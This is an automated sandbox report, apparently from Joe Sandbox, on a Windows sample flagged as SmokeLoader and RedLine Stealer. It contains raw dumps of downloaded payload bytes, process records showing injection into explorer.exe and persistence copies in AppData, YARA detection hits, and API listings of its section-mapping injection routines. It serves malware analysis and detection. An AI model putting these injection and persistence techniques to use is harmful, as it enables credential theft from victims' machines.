e3 b3 c6 83 56 46 29 22 Data Ascii: %Sc8?\erx+"SFfZ?X9wh6-wDqpIZhz/!sP%+tTMLQvfO(y`9w/DaG=(i<%F[kI#6P>]{bsI4=]\|YJT27u'nv(XcF3W$o<-HVRNVF)"
2024-10-11 04:37:58 UTC	8000	IN	Data Raw: 48 d8 f9 e0 c8 ac f4 20 b9 b8 d3 96 a7 7d 2f 27 e5 24 0c 9b 93 7b 66 77 12 b1 8d fb 20 20 43 a0 34 b0 3b 3f ed f8 5b 5b 39 e1 86 63 fb 4a 52 77 9c 3a ce 37 c1 d2 e6 bb b6 44 4f 88 5b 15 8d 09 24 dd 28 aa 52 1b 7a 46 ce 51 f6 cc d3 9a a2 5a 79 03 b2 6b dc 76 17 10 67 72 7a d9 aa 22 ca 89 07 61 de 15 80 81 3a 5c 5b b8 ac 69 44 be d1 2b 5a c4 b3 f7 40 a1 dd 24 67 91 05 c7 7b 9c 62 60 73 95 8d c4 5f 5c d0 50 23 31 e7 e7 cb 18 dc 4a 57 68 28 6d 4f a9 dd ec 17 93 4e 43 31 d9 77 c0 5a a2 88 42 7d d4 fe f7 3e d4 19 74 d5 2c f0 1f 74 45 e1 ea 61 81 c6 cc 8e 53 4e e0 07 80 d7 03 9a 48 d1 86 7f 62 0d 3c 8d ee 89 af 4b 1f d3 cb 05 b2 c7 8a 97 91 30 48 ce a5 d0 cc 2d e7 47 5a 86 af 6f e4 ed eb 76 f6 df 48 34 cd 7d 32 46 0a ce 9e 0b 42 78 70 75 bb ba e4 52 78 fd ee a2 Data Ascii: H }/'${fw C4;?[[9cJRw:7DO[$(RzFQZykvgrz"a:\[iD+Z@$g{b`s_\P#1JWh(mONC1wZB}>t,tEaSNHb<K0H-GZovH4}2FBxpuRx
2024-10-11 04:37:58 UTC	8000	IN	Data Raw: 0c 8f ad 78 ea f3 08 a2 54 ed ce d9 6f 4c 9c b9 47 b8 a0 57 9d 42 ff 8f 7f b2 4a 40 ac 2c 98 7a 3d 75 c8 85 5c 5d fc da 93 0a 7d 79 56 ef 2c b7 f2 b1 b5 7b 5e 56 0b 55 d9 dc 0b 78 4e 2a ec ca fb e9 23 f8 a5 9f b7 df 3c 0e 58 d9 9d 47 f8 8f 8a f1 51 7b 3f 71 c9 f0 c1 c8 53 91 8d cd d1 f9 5d b7 80 cb b0 10 48 9f 0d 81 d4 1e b1 23 04 3b 3c 2f 2c ad 5e 63 d1 1d 9c e7 ca 90 78 91 7e 40 b1 2a 6b ba d9 4b c6 3c 24 4d e3 bf 02 66 83 cd 6d fe dc a0 d8 f7 0d 73 76 fe d0 e9 ab 93 1b 8d 85 91 80 93 34 1e bd e6 6b fe 5c cf 8d d0 b5 c7 bf 62 23 7e 01 62 b2 28 31 fc 14 2c c1 27 c9 2d 9d 56 21 f0 dd 3f 71 7d 8f d1 6f 63 df 59 63 93 7e 46 27 c8 f9 12 91 6d 12 c6 6d c1 b4 55 2e ba 97 7c 8e ef ff 50 c1 e8 6e 3a 6e b1 cf e0 15 1b 78 5b 85 cf 98 dd a2 c4 be 7d 86 c2 d8 f3 02 Data Ascii: xToLGWBJ@,z=u\]}yV,{^VUxN#<XGQ{?qS]H#;</,^cx~@kK<$Mfmsv4k\b#~b(1,'-V!?q}ocYc~F'mmU.\|Pn:nx[}
2024-10-11 04:37:58 UTC	8000	IN	Data Raw: 55 4e b7 be ad de ef 30 64 ae 70 0f 52 9f 33 d0 b4 b6 ca 8f f6 7a 7c 0c 3d 0d b9 d2 00 6b 15 6a ab 88 d4 75 c5 ea b0 20 73 b0 ed 20 85 7a 09 3f 8b e3 d0 ca c5 bf 76 9b 54 a5 4a cf 3c 3e 55 9c 1c fa 43 16 2f 1d 38 e8 87 89 07 69 ae e3 e4 6c 1d 0b fa 74 e8 07 2f 71 75 db 32 d3 2f 45 c3 6a 90 c4 1e 00 bf 9e ac fe c4 9f c4 7c d2 22 12 e5 62 8d 58 3b 55 2f fb 5d 22 f4 c8 c7 ba da d0 1b c4 13 f2 83 ef 9f 0d 0e e3 63 8b e6 8a 01 68 52 65 46 56 33 4f 38 6f 3c f0 ab a6 e0 91 cc 58 0e 16 2b 8e 55 ba 7f 48 50 af 47 4d 01 45 b2 48 e0 f2 61 77 51 42 7a a4 96 e9 71 7d e1 8b e3 2f 96 bb 4e 46 4e 83 00 53 0b 28 e1 11 b5 38 70 42 a8 7d 78 23 64 3c f5 79 25 34 f7 7f 55 b1 56 d9 43 e9 4d cd b3 2c fb 8e 39 bc ce 2b fc d6 ab a4 db f6 36 71 e1 35 8d 95 d2 43 b3 1d 66 f6 4f 44 Data Ascii: UN0dpR3z\|=kju s z?vTJ<>UC/8ilt/qu2/Ej\|"bX;U/]"chReFV3O8o<X+UHPGMEHawQBzq}/NFNS(8pB}x#d<y%4UVCM,9+6q5CfOD
2024-10-11 04:37:58 UTC	8000	IN	Data Raw: 0d 68 be 9d 64 a7 00 5f 54 0b c4 a8 68 30 65 aa 06 46 47 cf e7 30 76 33 84 c0 5e 03 2e 85 3c aa 30 83 01 29 f1 61 01 b1 09 cc fb f5 8b b5 50 9a 99 57 57 1b 58 cd e6 dd 09 47 0e 42 6c 22 6d bf 7f 14 63 f4 3f e5 7a 63 11 9e 3b 66 2b e1 65 2a 70 a9 54 e9 3c ea 5c 36 0e 47 6d dc c7 e6 da 3e d5 77 e7 03 1c f4 17 1d 52 4b ee 49 86 dc 54 eb 4d ee 53 ae 48 85 9c 4b 1d 8e 9b 79 cf 1e 5b bf 6d 66 c4 e1 17 59 1e c0 db ba 41 ba a6 bc 24 2d 7d 71 0e 44 ea 7c 73 39 60 2e 67 68 68 df bd e5 4c a6 f8 fb 19 99 d3 92 98 72 cc 91 b4 9f cd 52 26 2e 85 64 ea 3f 9b 50 e0 72 37 33 09 59 44 f9 7d 60 ae b6 03 95 62 33 b2 b8 8b 33 49 d4 10 b0 25 9d f5 32 9e 9d 53 e4 b0 7c 4e f4 98 93 f2 5f ac 9d fe 88 c4 11 c8 be 6f 75 71 1c 6b c9 26 60 da 89 14 44 5d 2d 23 c9 03 5f 6c df ce 2b 15 Data Ascii: hd_Th0eFG0v3^.<0)aPWWXGBl"mc?zc;f+e*pT<\6Gm>wRKITMSHKy[mfYA$-}qD\|s9`.ghhLrR&.d?Pr73YD}`b33I%2S\|N_ouqk&`D]-#_l+

Target ID:	0
Start time:	00:36:55
Start date:	11/10/2024
Path:	C:\Users\user\Desktop\wBgwzVbZuV.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\wBgwzVbZuV.exe"
Imagebase:	0x400000
File size:	245'760 bytes
MD5 hash:	A50C051C3BEB22A0F9CE8694FB4D0BAB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1760101074.0000000002DF7000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1759796388.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1760185099.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1760185099.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1759831578.0000000002C40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1759831578.0000000002C40000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	00:37:04
Start date:	11/10/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	00:37:23
Start date:	11/10/2024
Path:	C:\Users\user\AppData\Roaming\wehrbbi
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\wehrbbi
Imagebase:	0x400000
File size:	245'760 bytes
MD5 hash:	A50C051C3BEB22A0F9CE8694FB4D0BAB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2011339150.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2011339150.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2011243889.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2011243889.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2011394897.0000000002D27000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.2011202402.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 42%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	00:37:57
Start date:	11/10/2024
Path:	C:\Users\user\AppData\Local\Temp\F421.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\F421.exe
Imagebase:	0x400000
File size:	244'736 bytes
MD5 hash:	500B5F7BBE44E1C2370628C67AC45F67
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2354485892.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2354485892.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.2354367271.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.2354648687.0000000002DA7000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2354402356.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2354402356.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	00:38:26
Start date:	11/10/2024
Path:	C:\Users\user\AppData\Roaming\rghrbbi
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\rghrbbi
Imagebase:	0x400000
File size:	244'736 bytes
MD5 hash:	500B5F7BBE44E1C2370628C67AC45F67
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000008.00000002.2705916813.0000000002BB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000008.00000002.2705916813.0000000002BB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000008.00000002.2706573032.0000000002D27000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000008.00000002.2705859376.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000008.00000002.2706245670.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000008.00000002.2706245670.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	00:40:01
Start date:	11/10/2024
Path:	C:\Users\user\AppData\Roaming\wehrbbi
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\wehrbbi
Imagebase:	0x400000
File size:	245'760 bytes
MD5 hash:	A50C051C3BEB22A0F9CE8694FB4D0BAB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	00:40:01
Start date:	11/10/2024
Path:	C:\Users\user\AppData\Roaming\rghrbbi
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\rghrbbi
Imagebase:	0x400000
File size:	244'736 bytes
MD5 hash:	500B5F7BBE44E1C2370628C67AC45F67
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	29.7%
Signature Coverage:	41.1%
Total number of Nodes:	175
Total number of Limit Nodes:	7

Executed Functions

Function 00415B00 Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 283
timefilelibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00415BF2
ReadConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00415BFF
FindAtomW.KERNEL32(00000000), ref: 00415C06
GetConsoleMode.KERNEL32(00000000,00000000), ref: 00415C0E
SearchPathA.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00415C26
GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00415C4D
MoveFileW.KERNEL32(00000000,00000000), ref: 00415C55
GetVersionExW.KERNEL32(?), ref: 00415C62
DisconnectNamedPipe.KERNEL32(?), ref: 00415C75
ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 00415CBA
GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00415CC9
GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00415CD2
PulseEvent.KERNEL32(00000000), ref: 00415CE2
SetCommState.KERNELBASE(00000000,00000000), ref: 00415D09
GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 00415D3A
GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 00415D4B
GetComputerNameW.KERNEL32(?,?), ref: 00415D5F
GetTimeFormatW.KERNEL32(00000000,00000000,?,004173C0,?,00000000), ref: 00415D9F
GetFileAttributesA.KERNEL32(00000000), ref: 00415DA6
GetConsoleAliasExesLengthA.KERNEL32 ref: 00415DAC
GetBinaryType.KERNEL32(004173D8,?), ref: 00415DBE
LoadLibraryA.KERNELBASE(004173E8), ref: 00415E32
InterlockedDecrement.KERNEL32(?), ref: 00415E84
GetFileAttributesA.KERNEL32(004173F4), ref: 00415EB7

Strings

k`, xrefs: 00415E67
}$, xrefs: 00415E8B

Memory Dump Source

Source File: 00000000.00000002.1758701665.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_wBgwzVbZuV.jbxd

Similarity

API ID: Console$File$AttributesCommInterlockedLengthNameReadTimeType$AdjustmentAliasAliasesAtomBinaryCompareComputerConfigDecrementDefaultDisconnectEventExchangeExesFindFormatLibraryLoadModeModuleMoveNamedOutputPathPipePulseSearchStateStringSystemVersion
String ID: k`$}$
API String ID: 723190256-956986773
Opcode ID: 8b7da9863702e3dcd0db57a90b470b456827346f47e57f256fa4e14a1f125c19
Instruction ID: 59ac31373c954154000cefc7af6afdb20c2223af4aecfae594a4346f9e797540
Opcode Fuzzy Hash: 8b7da9863702e3dcd0db57a90b470b456827346f47e57f256fa4e14a1f125c19
Instruction Fuzzy Hash: 97A1C171941624DFC724DB61EC48EDB7B79EF8D340F4180AAF609A7250DB385A81CFA9

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1758673917.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wBgwzVbZuV.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1758673917.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wBgwzVbZuV.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1758673917.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wBgwzVbZuV.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1758673917.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wBgwzVbZuV.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1758673917.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wBgwzVbZuV.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 004030CB
NtTerminateProcess.NTDLL ref: 004030E4

Memory Dump Source

Source File: 00000000.00000002.1758673917.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wBgwzVbZuV.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

Function 02DFA8A7 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02DFA8CF
Module32First.KERNEL32(00000000,00000224), ref: 02DFA8EF

Memory Dump Source

Source File: 00000000.00000002.1760101074.0000000002DF7000.00000040.00000020.00020000.00000000.sdmp, Offset: 02DF7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2df7000_wBgwzVbZuV.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: ef48994b9da0f4adb225bce54405f71fce5137213b79ca4e73999253d25cd01a
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: CAF09632200715ABD7603BF5DC8CB6E77E8EF49624F110529E74B916C0DBB0EC468AA5

Function 02C3003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02C3024D

Strings

kernel32.dll, xrefs: 02C3008F, 02C30095
cess, xrefs: 02C3018D

Memory Dump Source

Source File: 00000000.00000002.1759796388.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_wBgwzVbZuV.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: fd138f845daf221564a553f87e6ae7a9839ede97e432baf425e83feb7a45334c
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 14527975A00229DFDB65CF58C984BACBBB1BF09304F1484D9E90DAB351DB30AA85CF14

Function 004157A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(02B17CE0), ref: 0041587F
GetProcAddress.KERNEL32(00000000,00419CC8), ref: 004158BC
VirtualProtect.KERNELBASE(02B17B24,02B17CDC,00000040,?), ref: 004158DB

Strings

, xrefs: 004157E5

Memory Dump Source

Source File: 00000000.00000002.1758701665.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_wBgwzVbZuV.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-3916222277
Opcode ID: 116f1aac112c905ec162d7070cd71efd76129b0df4f3260cda570b903644e0cb
Instruction ID: e4fb223d50131012075ae1e13ab3c59e5b4ef3b604d21eb0d0e12d9e3e0b2718
Opcode Fuzzy Hash: 116f1aac112c905ec162d7070cd71efd76129b0df4f3260cda570b903644e0cb
Instruction Fuzzy Hash: C0312310958380CAF301CB78F8147927FE2BB25744F449479D188873A5EFBA5924D7EE

Function 02C30E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02C30223,?,?), ref: 02C30E19
SetErrorMode.KERNELBASE(00000000,?,?,02C30223,?,?), ref: 02C30E1E

Memory Dump Source

